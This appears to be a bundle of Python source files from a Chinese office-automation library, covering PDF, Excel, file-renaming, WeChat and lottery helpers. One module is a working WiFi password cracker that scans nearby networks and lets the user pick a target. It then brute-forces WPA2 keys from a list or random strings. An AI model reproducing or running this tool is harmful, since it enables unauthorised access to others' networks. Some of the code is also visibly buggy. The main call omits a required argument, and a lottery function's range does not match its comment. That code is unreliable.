#                     # 打印未被链接图片名列表
#                     print(i)
#             else:
#                 print(f"{image_path.resolve()}内无未被链接的图片")
#         elif not markdown_path.is_file():
#             print("markdown文件路径输入有误，请检查！")
#         elif not image_path.is_dir():
#             print("图片存放路径输入有误，请检查！")



from office.api import word
from office.api import pdf
from office.api import image
from office.api import file
from office.api import video
from office.api import tools
from office.api import ppt
from office.api import excel
from office.api import wechat
# 以下是beta版本
from office.api.testApi import ruiming

print('=' * 30)
print('【python-office库】，功能持续更新中')
print('使用有问题 or 提交你的功能需求 or 参与项目开发')
print('1、全部功能【视频 & 文字】教程：https://www.python-office.com/')
print('2、请+【项目交流群】：http://t.cn/A6SSrID0')
print('3、本开源项目的【代码仓库】：https://github.com/CoderWanFeng/python-office')
print('=' * 30)



# import os
# from win32com.client import constants, gencache
#
#
# class MainWord():
#
#     def file2pdf(self, path, docxSuffix=".docx"):
#         wordFiles = []
#         # 如果不存在，则不做处理
#         if not os.path.exists(path):
#             print("path does not exist path = " + path)
#             return
#         # 判断是否是文件
#         elif os.path.isfile(path):
#             print("path file type is file " + path)
#             wordFiles.append(path)
#         # 如果是目录，则遍历目录下面的文件
#         elif os.path.isdir(path):
#             print(os.listdir(path))
#             # 填充路径，补充完整路径
#             if not path.endswith("/") or not path.endswith("\\"):
#                 path = path + "/"
#             for file in os.listdir(path):
#                 if file.endswith(docxSuffix):
#                     wordFiles.append(path + file)
#         print(wordFiles)
#         for file in wordFiles:
#             filepath = os.path.abspath(file)
#             index = filepath.rindex('.')
#             pdfPath = os.path.abspath(filepath[:index] + '.pdf')
#             print(pdfPath)
#             self.createpdf(filepath, pdfPath)
#
#
#     def createpdf(self,wordPath, pdfPath):
#         word = gencache.EnsureDispatch('Word.Application')
#         doc = word.Documents.Open(wordPath, ReadOnly=1)
#         # 转换方法
#         doc.ExportAsFixedFormat(pdfPath, constants.wdExportFormatPDF)
#         word.Quit()


# import search4file
# from faker import Faker
# import pandas as pd
# from alive_progress import alive_bar
#
# from office.lib.excel import SplitExcel
# from office.lib.utils import pandas_mem
# import os
# from pathlib import Path
# from openpyxl import load_workbook
# import warnings
# from tqdm import tqdm
#
# # 忽略waring警告
# warnings.filterwarnings("ignore")
#
#
# class MainExcel():
#
#     def fake2excel(self, columns, rows, path, language):
#         """
#         @Author & Date  : CoderWanFeng 2022/5/13 0:12
#         @Desc  : columns:list，每列的数据名称，默认是名称
#                 rows：多少行，默认是1
#                 language：什么语言，可以填english，默认是中文
#                 path：输出excel的位置，有默认值
#         """
#         # 可以选择英语
#         if language.lower() == 'english':
#             language = 'en_US'
#         else:
#             language = 'zh_CN'
#         # 开始造数
#         fake = Faker(language)
#         excel_dict = {}
#         with alive_bar(len(columns) * rows) as bar:
#             for column in columns:
#                 excel_dict[column] = list()
#                 # excel_dict[column] = map(lambda x: eval('fake.{func}()'.format(func=x)), [column] * rows) # 使用map，会报错
#                 while len(excel_dict[column]) < rows:
#                     excel_dict[column].append(eval('fake.{func}()'.format(func=column)))
#                     bar()
#             # 用pandas，将模拟数据，写进excel里面
#             writer = pd.ExcelWriter(path)
#             data = pd.DataFrame(excel_dict)
#             data = pandas_mem.reduce_pandas_mem_usage(data)
#             data.to_excel(writer, index=False)
#             # writer.save()
#             writer.close()
#
#     def merge2excel(self, dir_path, output_file, xlsxSuffix=".xlsx"):
#         """
#         :param dir_path: 存放excel文件的位置
#         :param output_file: 输出合并后excel文件的位置
#         :return: 没有返回值
#         """
#         if not output_file.endswith(xlsxSuffix):
#             raise Exception(f'您自定义的输出文件名，不是以{xlsxSuffix}结尾的')
#         file_path_dict = self.getfile(dir_path)  # excel文件所在的文件夹
#         try:
#             writer = pd.ExcelWriter(output_file)  # 合并后的excel名称
#         except PermissionError:
#             raise Exception(f'小可爱，你的输出文件，是不是上次打开了没关闭呀？这是你自己指定的输出文件名称：{output_file}')
#         for file, path in file_path_dict.items():
#             if file.endswith("xlsx"):
#                 df = pd.read_excel(path)
#             if file.endswith("csv"):
#                 df = pd.read_csv(path)
#             df.to_excel(writer, sheet_name=file.split('.')[0], index=False)
#         print(f'您指定的Excel文件已经合并完毕，合并后的文件名是{output_file}')
#         writer.save()
#
#     def getfile(self, dirpath):
#         path = Path(dirpath)
#         file_path_dict = {}
#         for root, dirs, files in os.walk(dirpath):
#             for file in files:
#                 if file.endswith("xlsx") or file.endswith("csv"):
#                     file_path_dict[file] = (path / file)
#         return file_path_dict
#
#     def sheet2excel(self, file_path):
#         # 先读取一次文件，获取sheet表的名称
#
#         origin_excel = load_workbook(filename=file_path)  # 读取原excel文件
#         origin_sheet_names = origin_excel.sheetnames  # 获取sheet的名称
#         print(f'一共有{len(origin_sheet_names)}个sheet，名称分别为：{origin_sheet_names}')
#         print('拆分开始')
#
#         if len(origin_sheet_names) > 1:  # 如果sheetnames小于1，报错：该文件不需要拆分
#
#             for j in tqdm(range(len(origin_sheet_names))):
#
#                 wb = load_workbook(filename=file_path)  # 再读取一次文件，由于每次删除后需要保存一次，所以不能与上一次一样
#                 sheet = wb[origin_sheet_names[j]]
#                 wb.copy_worksheet(sheet)
#
#                 new_filename = origin_sheet_names[j] + '.xlsx'  # 新建一个sheet命名的excel文件
#
#                 for i in tqdm(range(len(origin_sheet_names))):
#                     sheet1 = wb[origin_sheet_names[i]]
#                     wb.remove(sheet1)
#
#                 wb.save(filename=new_filename)
#
#                 # 由于使用copy_worksheet后，sheet表名有copy字段，这里做个调整
#
#                 new = load_workbook(filename=new_filename)
#                 news = new.active
#                 news.title = origin_sheet_names[j]
#                 new.save(filename=new_filename)
#             print('拆分结束')
#         else:
#             raise Exception(f"你的文件只有一个sheet，难道还要拆分吗？我做不到啊~~~，你的文件名{file_path}")
#
#     def merge2sheet(self, dir_path, output_sheet_name: str, output_excel_name):
#         # 多个excel文件，合并到一个sheet里面
#         for root, dirs, files in os.walk(dir_path):
#             path = Path(dir_path)
#             print(f'正在合并的文件有：{files}')
#             print(f'合并后的文件名是：{output_excel_name}')
#             print(f'合并后的sheet名是：{output_sheet_name}')
#             df_list = []
#             for file in files:
#                 if file.endswith("xlsx") or file.endswith("xls"):
#                     excel_path = (path / file)
#                     df_list.append(pd.read_excel(excel_path))
#             res = pd.concat(df_list)
#             res.to_excel(
#                 (path / (output_excel_name + '.xlsx')),
#                 sheet_name=output_sheet_name,
#                 index=False  # 不保留index
#             )
#
#             pass
#
#     def find_excel_data(self, search_key, target_dir):
#         """
#         检索指定目录下的excel文件和过滤
#         参数：
#             search_key：检索的关键词
#             target_dir：目标文件夹
#         """
#         search4file.find_excel_data(search_key, target_dir)
#
#     def split_excel_by_column(self, filepath, column, worksheet_name):
#         SplitExcel.split_excel_by_column(filepath, column, worksheet_name)



# -*- coding: utf-8 -*-


# popdf = popdf()


# 给pdf加水印-无参数
# @except_dec()
import popdf


def add_watermark() -> None:
    popdf.add_watermark()


# 给pdf加水印-有参数
# @except_dec()
def add_watermark_by_parameters(pdf_file, mark_str, output_file_name='添加了水印的文件.pdf') -> None:
    """
    必填参数：
    pdf_file:pdf的位置，例如：d:/code/程序员晚枫.pdf
    mark_str:需要添加的水印内容，例如：百度一下：程序员晚枫
    选填参数：
    output_file_name：指定添加了水印的文件名称，可以不指定，默认是：添加了水印的文件.pdf
    """
    popdf.add_watermark_by_parameters(pdf_file, mark_str, output_file_name)


# txt转pdf
# @except_dec()
def txt2pdf(path: str, res_pdf='txt2pdf.pdf'):
    popdf.file2pdf(path, res_pdf)


# PDF加密
# @except_dec()
def encrypt4pdf(path, password, res_pdf='encrypt.pdf'):
    popdf.encrypt4pdf(path, password, res_pdf)


# PDF解密
# @except_dec()
def decrypt4pdf(path, password, res_pdf='decrypt.pdf'):
    popdf.decrypt4pdf(path, password, res_pdf)


# 合并pdf
# @except_dec()
def merge2pdf(one_by_one, output):
    popdf.merge2pdf(one_by_one, output)


# todo：输入文件路径
# @except_dec()
def pdf2docx(file_path, output_path='.'):
    popdf.pdf2docx(file_path, output_path)


# @except_dec()
def pdf2imgs(pdf_path, out_dir):
    popdf.pdf2imgs(pdf_path, out_dir)


# @except_dec()
def add_img_water(pdf_file_in, pdf_file_mark, pdf_file_out):
    popdf.add_img_water(pdf_file_in, pdf_file_mark, pdf_file_out)



import pywifi
import time
from pywifi import const
import string
import random
import threading


# WiFi扫描模块
def wifi_scan():
    # 初始化wifi
    wifi = pywifi.PyWiFi()
    # 使用第一个无线网卡
    interface = wifi.interfaces()[0]
    # 开始扫描
    interface.scan()
    for i in range(4):
        time.sleep(1)
        print('\r扫描可用 WiFi 中，请稍后。。。（' + str(3 - i), end='）')
    print('\r扫描完成！\n' + '-' * 38)
    print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名'))
    # 扫描结果，scan_results()返回一个集，存放的是每个wifi对象
    bss = interface.scan_results()
    # 存放wifi名的集合
    wifi_name_set = set()
    for w in bss:
        # 解决乱码问题
        wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8'))
        wifi_name_set.add(wifi_name_and_signal)
    # 存入列表并按信号排序
    wifi_name_list = list(wifi_name_set)
    wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True)
    num = 0
    # 格式化输出
    while num < len(wifi_name_list):
        print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1]))
        num += 1
    print('-' * 38)
    # 返回wifi列表
    return wifi_name_list


# WIFI破解模块
def wifi_password_crack(wifi_name, pwd_len, pwd_list):
    # 创建wifi对象
    wifi = pywifi.PyWiFi()
    # 创建网卡对象，为第一个wifi网卡
    interface = wifi.interfaces()[0]
    # 断开所有wifi连接
    interface.disconnect()
    # 等待其断开
    while interface.status() == 4:
        # 当其处于连接状态时，利用循环等待其断开
        pass
    # 创建连接文件（对象）
    profile = pywifi.Profile()
    # wifi名称
    profile.ssid = wifi_name
    # 需要认证
    profile.auth = const.AUTH_ALG_OPEN
    # wifi默认加密算法
    profile.akm.append(const.AKM_TYPE_WPA2PSK)
    profile.cipher = const.CIPHER_TYPE_CCMP
    while True:
        if pwd_list:
            # wifi密码
            for pwd in pwd_list:
                profile.key = pwd
                # 删除所有wifi连接文件
                interface.remove_all_network_profiles()
                # 设置新的wifi连接文件
                tmp_profile = interface.add_network_profile(profile)
                # 开始尝试连接
                print(f'\r正在利用密码 {pwd} 尝试破解 ing...')
                interface.connect(tmp_profile)
                time.sleep(5)
                # if time.time() - start_time < 2:
                if interface.status() == 4:
                    print(f'\r连接成功！密码为：{pwd}')
                    exit(0)
                    print()
                    # print(start_time)
                    # 接口状态为4代表连接成功（当尝试时间大于1.5秒之后则为错误密码，经测试测正确密码一般都在1.5秒内连接，若要提高准确性可以设置为2s或以上，相应暴力破解速度就会变慢）
            print(f'{pwd_list}中，没有合适的密码')
        else:
            # wifi密码
            chars = string.digits + string.ascii_letters
            pwd = ''.join(random.sample(chars * 10, pwd_len))
            profile.key = pwd
            # 删除所有wifi连接文件
            interface.remove_all_network_profiles()
            # 设置新的wifi连接文件
            tmp_profile = interface.add_network_profile(profile)
            # 开始尝试连接
            print(f'\r正在利用密码 {pwd} 尝试破解 ing...')
            interface.connect(tmp_profile)
            time.sleep(5)
            # if time.time() - start_time < 2:
            if interface.status() == 4:
                print(f'\r连接成功！密码为：{pwd}')
                exit(0)
                print()
                # print(start_time)
                # 接口状态为4代表连接成功（当尝试时间大于1.5秒之后则为错误密码，经测试测正确密码一般都在1.5秒内连接，若要提高准确性可以设置为2s或以上，相应暴力破解速度就会变慢）


# 主函数
def pwd4wifi_service(pwd_len, pwd_list):
    # 退出标致
    exit_flag = 0
    # 目标编号
    target_num = -1
    while not exit_flag:
        try:
            print('WiFi密码破解'.center(35, '-'))
            # 调用扫描模块，返回一个排序后的wifi列表
            wifi_list = wifi_scan()
            # 让用户选择要破解的wifi编号，并对用户输入的编号进行判断和异常处理
            choose_exit_flag = 0
            while not choose_exit_flag:
                try:
                    target_num = int(input('请选择你要尝试破解的wifi：'))
                    # 如果要选择的wifi编号在列表内，继续二次判断，否则重新输入
                    if target_num in range(len(wifi_list)):
                        # 二次确认
                        while not choose_exit_flag:
                            try:
                                choose = str(input(f'你选择要破解的WiFi名称是：{wifi_list[target_num][1]}，确定吗？（Y/N）'))
                                # 对用户输入进行小写处理，并判断
                                if choose.lower() == 'y':
                                    choose_exit_flag = 1
                                elif choose.lower() == 'n':
                                    break
                                # 处理用户其它字母输入
                                else:
                                    print('只能输入 Y/N 哦o(*￣︶￣*)o')
                            # 处理用户非字母输入
                            except ValueError:
                                print('只能输入 Y/N 哦o(*￣︶￣*)o')
                        # 退出破解
                        if choose_exit_flag == 1:
                            break
                        else:
                            print('请重新输入哦(*^▽^*)')
                except ValueError:
                    print('只能输入数字哦o(*￣︶￣*)o')
            # 密码破解，传入用户选择的wifi名称
            # 第一个参数是方法，第二个参数是方法的参数
            # t1 = threading.Thread(target=wifi_password_crack, args=(wifi_list[target_num][1], pwd_len,))  # target是要执行的函数名（不是函数），args是函数对应的参数，以元组的形式存在
            # t2 = threading.Thread(target=wifi_password_crack, args=(wifi_list[target_num][1], pwd_len,))  # target是要执行的函数名（不是函数），args是函数对应的参数，以元组的形式存在
            # t1.start()
            # t2.start()
            wifi_password_crack(wifi_list[target_num][1], pwd_len, pwd_list)
            print('-' * 38)
            exit_flag = 1
        except Exception as e:
            print(e)
            raise e


if __name__ == '__main__':
    pwd4wifi_service(pwd_len=8)



import unittest

# if __name__ == '__main__':
#     test_dir = './test_unit'
#     suite = unittest.defaultTestLoader.discover(test_dir, pattern='test_*.py')
#     # 创建测试runner，执行测试用例集
#     with open('test_result.txt', 'w+') as f:
#         runner = unittest.TextTestRunner(stream=f, verbosity=2)
#         runner.run(suite)
import pytest

if __name__ == '__main__':
    pytest.main(['./test_unit', '--html=report.html'])



# import moviepy.editor as mp
#
#
# class MainVideo():
#
#     # 从视频里提取音频
#     def video2mp3(self, path, mp3_name):
#         """
#         :param path: 视频文件的路径
#         :param mp3_name: mp3的名字，可以为空
#         :return:
#         """
#         # specify the mp4 file here(mention the file path if it is in different directory)
#         clip = mp.VideoFileClip(path)
#         if mp3_name:
#             clip.audio.write_audiofile(str(mp3_name) + '.mp3')
#         else:
#             # specify the name for mp3 extracted
#             clip.audio.write_audiofile('Audio.mp3')
#             # you will notice mp3 file will be created at the specified location.



# from office.core.WeChatType import MainWeChat
#
# mainwx = MainWeChat()

import PyOfficeRobot


def send_message(who, message):
    PyOfficeRobot.chat.send_message(who, message)


def send_file(who, file):
    PyOfficeRobot.file.send_file(who, file)



# import os
# from alive_progress import alive_bar
#
# import pathlib
# import openpyxl
#
# from office.lib.utils.time_utils import time_count_dec
#
#
# class MainFile():
#
#     def replace4filename(self, path, del_content, replace_content):
#         """
#         :param path: 需要替换的文件夹路径
#         :param del_content: 需要删除/替换的内容
#         :param replace_content: 替换后的内容，可以不填 = 直接删除
#         :return:
#         """
#         # 获取该目录下所有文件，存入列表中；不包含子文件夹
#         fileList = os.listdir(path)
#         work_count = 0
#         with alive_bar(len(fileList)) as bar:
#             for old_file_name in fileList:  # 依次读取该路径下的文件名
#                 bar()  # 进度条
#                 if del_content in old_file_name:
#
#                     if replace_content:
#                         new_file_name = old_file_name.replace(del_content, replace_content)
#                     else:
#                         new_file_name = old_file_name.replace(del_content, '')
#                     os.rename(path + os.sep + old_file_name, path + os.sep + new_file_name)
#                     work_count = work_count + 1
#         print("当前目录下，共有{}个文件/文件夹，本次运行共进行了{}个文件/文件夹的重命名".format(len(fileList), work_count))
#
#     @time_count_dec
#     def file_name_insert_content(self, file_path, insert_position: int, insert_content: str):
#         """
#
#         :param file_path: 文件存放路径
#         :param insert_position: 插入位置（内容将插入在此之后，如果输入位置大于文件主名长度将插入在末尾）
#         :param insert_content: 插入内容
#         """
#         Path = pathlib.Path(file_path).resolve()
#         if Path.is_dir():
#             FileNameList = list(Path.glob("*"))  # 获取该路径下的文件列表
#             for FileName in FileNameList:
#                 if FileName.is_file():  # 判断是否为文件，只对文件进行操作
#                     FileNameExtension = "".join(list(FileName.suffixes))
#                     FileNameRoot = FileName.name.replace(FileNameExtension, "")
#                     # 分离文件主名和扩展名，防止对扩展名进行操作
#                     FileNameFormer = FileNameRoot[:insert_position:]
#                     FileNameLatter = FileNameRoot[insert_position::]
#                     # 拆分文件主名
#                     NewFileName = FileNameFormer + insert_content + FileNameLatter + FileNameExtension  # 合并文件名
#                     if not Path.joinpath(NewFileName).is_file():
#                         FileName.rename(Path.joinpath(NewFileName))
#                     else:
#                         print(f"该目录下已存在名为{NewFileName}的文件，请检查！")
#         else:
#             print("请输入文件夹路径")
#
#     @time_count_dec
#     def file_name_add_prefix(self, file_path, prefix_content: str):
#         """
#
#         :param file_path: 文件存放路径
#         :param prefix_content: 前缀内容
#         """
#         Path = pathlib.Path(file_path).resolve()
#         if Path.is_dir():
#             FileNameList = list(Path.glob("*"))  # 获取该路径下的文件列表
#             for FileName in FileNameList:
#                 if FileName.is_file():  # 判断是否为文件，只对文件进行操作
#                     NewFileName = prefix_content + FileName.name  # 合并文件名
#                     if not Path.joinpath(NewFileName).is_file():
#                         FileName.rename(Path.joinpath(NewFileName))
#                     else:
#                         print(f"该目录下已存在名为{NewFileName}的文件，请检查！")
#         else:
#             print("请输入文件夹路径")
#
#     @time_count_dec
#     def file_name_add_postfix(self, file_path, postfix_content: str):
#         """
#
#         :param file_path: 文件存放路径
#         :param postfix_content: 后缀内容
#         """
#         Path = pathlib.Path(file_path).resolve()
#         if Path.is_dir():
#             FileNameList = list(Path.glob("*"))  # 获取该路径下的文件列表
#             for FileName in FileNameList:
#                 if FileName.is_file():  # 判断是否为文件，只对文件进行操作
#                     FileNameExtension = "".join(list(FileName.suffixes))
#                     FileNameRoot = FileName.name.replace(FileNameExtension, "")
#                     # 分离文件主名和扩展名
#                     NewFileName = FileNameRoot + postfix_content + FileNameExtension  # 合并文件名
#                     if not Path.joinpath(NewFileName).is_file():
#                         FileName.rename(Path.joinpath(NewFileName))
#                     else:
#                         print(f"该目录下已存在名为{NewFileName}的文件，请检查！")
#         else:
#             print("请输入文件夹路径")
#
#     def search_specify_type_file(self, file_path, file_type: str):
#         '''
#
#         :param file_path:目标路径
#         :param file_type:需要查找的文件类型
#         '''
#         print("开始查找")
#         i = 0  # 计数变量
#         file_path = pathlib.Path(file_path).resolve()
#         if file_path.is_dir():
#             file_name_list = list(file_path.glob("**/*"))  # 获取该路径下的文件列表
#             for file_name in file_name_list:
#                 file_name_extension = "".join(list(file_name.suffixes))
#                 if file_name_extension == file_type:
#                     print(f"{file_name.name}，{file_name.parent}")
#                     i = i + 1
#             print(f"查找完成，共找到{i}个文件")
#         else:
#             print("请输入文件夹路径")
#
#     def output_file_list_to_excel(self,dir_path: str):
#         """
#         :param dir_path: 需要生成文件列表的目录
#         """
#         dir_path = pathlib.Path(dir_path).resolve()
#         if dir_path.is_dir():
#             dir_path_list = list(dir_path.glob("**/*"))
#             output_excel = openpyxl.Workbook()
#             output_excel_sheet = output_excel.active
#             output_excel_sheet.append(["完整路径", "文件所在路径", "文件名"])
#             for file_path in dir_path_list:
#                 if file_path.is_file():
#                     output_excel_sheet.append([str(file_path), str(file_path.parent), str(file_path.name)])
#             output_excel.save(dir_path.joinpath("本目录文件列表.xlsx"))
#         else:
#             print("请输入正确的文件路径！")


import random


def SSL():
    red_ball = random.sample(range(1, 34), 6)
    blue_ball = random.sample(range(1, 17), 1)
    return f'双色球的号码是：红色球{red_ball}，蓝色球{blue_ball}'


def D3():
    pass


def SLC():
    pass


def CCDLT():
    pass


def QXC():
    pass


def PL3():
    pass


def PL5():
    pass


def KL8():
    pass


def QWS():
    pass


def X_22_5():
    res = random.sample(range(1, 33), 5)  # 1到22，不重复的5个数
    return res


def X_36_7():
    res = random.sample(range(1, 37), 7)  # 1到36，不重复的7个数
    return res


def X_26_5():
    res = random.sample(range(1, 27), 5)
    return res


ticket_kinds = {
    "0": ["退出", None],
    "1": ["双色球", SSL],
    "2": ["福彩3D", D3],
    "3": ["七乐彩", SLC],
    "4": ["超级大乐透", CCDLT],
    "5": ["七星彩", QXC],
    "6": ["排列3", PL3],
    "7": ["排列5", PL5],
    "8": ["快乐8", KL8],
    "9": ["七位数", QWS],
    "10": ["22选5", X_22_5],
    "11": ["36选7", X_36_7],
    "12": ["25选5", X_26_5],
}



# from translate import Translator
# import qrcode
# import string
# import random
# import socket
# import time
# from office.lib.tools.lottery8ticket import ticket_kinds
# from office.lib.tools.pwd4wifi_service import pwd4wifi_service
# from office.lib.tools.qoute_dict_create_article import qoute, create_article_main
#
# from office.lib.tools.weather_city_code import WEATHER_CITY_CODE_DIC
# from office.lib.tools.weather_service import weather_spider
#
#
# # from utils.tools.weather_city_code import WEATHER_CITY_CODE_DIC
#
#
# class MainTools():
#
#     def transtools(self, to_lang, content):
#         # specifying the language
#         translator = Translator(to_lang)
#         # typing the message
#         translation = translator.translate(content)
#         # print the translated message
#         print(translation)
#
#     def qrcodetools(self, url):
#         # Creating object
#         # version: defines size of image from integer(1 to 40), box_size = size of each box in pixels, border = thickness of the border.
#         qr = qrcode.QRCode(version=1, box_size=10, border=5)
#         # add_date :  pass the input text
#         qr.add_data(url)
#         # converting into image
#         qr.make(fit=True)
#         # specify the foreground and background color for the img
#         img = qr.make_image(fill='black', back_color='white')
#         # store the image
#         img.save('qrcode_img.png')
#
#     def passwordtools(self, len):
#         """
#         @Author & Date  : CoderWanFeng 2022/5/9 11:54
#         @Desc  : 随机密码生成器，默认是8位
#         @Return  ：
#         """
#         chars = string.digits + string.ascii_letters
#         return ''.join(random.sample(chars * 10, len))
#
#     def weather(self):
#         headers = {
#             'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7'
#         }
#         while (True):
#             try:
#                 cityName = input('请输入城市名称(按q/Q键退出)：')
#                 if cityName == 'q' or cityName == 'Q':
#                     break
#                 cityCode = WEATHER_CITY_CODE_DIC[cityName]  # 得到城市代码
#                 url = 'http://www.weather.com.cn/weather1d/%d.shtml' % cityCode  # 得到城市天气网址
#                 weather_spider(url, headers)
#             except:
#                 print('未查到%s城市，请重新输入：' % cityName)
#
#     # 通过url，获取ip地址
#     def url2ip(self, url):
#         socket_list = socket.getaddrinfo(url, None, 0, socket.SOCK_STREAM)
#         ip_info = socket_list[0][4][0]
#         print('【{}】 这个网址对应的IP地址是：{}'.format(url, ip_info))
#
#     def lottery8ticket(self):
#         '''
#         自动生成彩票
#         种类代码：
#
#         '''
#         while True:
#             for num, name_def in ticket_kinds.items():
#                 print(num, name_def[0])
#             kind = input("选择一个种类：")
#             if kind == str(0):
#                 break
#             print('*' * 20)
#             if not ticket_kinds.get(kind)[1]():
#                 print('这个规则太复杂了，我们正在开发。如果可以提供建议，请私信：http://t.cn/A6XVQXAk')
#             else:
#                 print(f'{ticket_kinds.get(kind)[0]}的号码是 -->> {ticket_kinds.get(kind)[1]()}')
#             print('*' * 20)
#
#     def create_article(self, theme, line_num):
#         create_article_main(theme, line_num)
#
#     # 破解wifi密码
#     def pwd4wifi(self, len_pwd, pwd_list):
#         pwd4wifi_service(len_pwd, pwd_list)
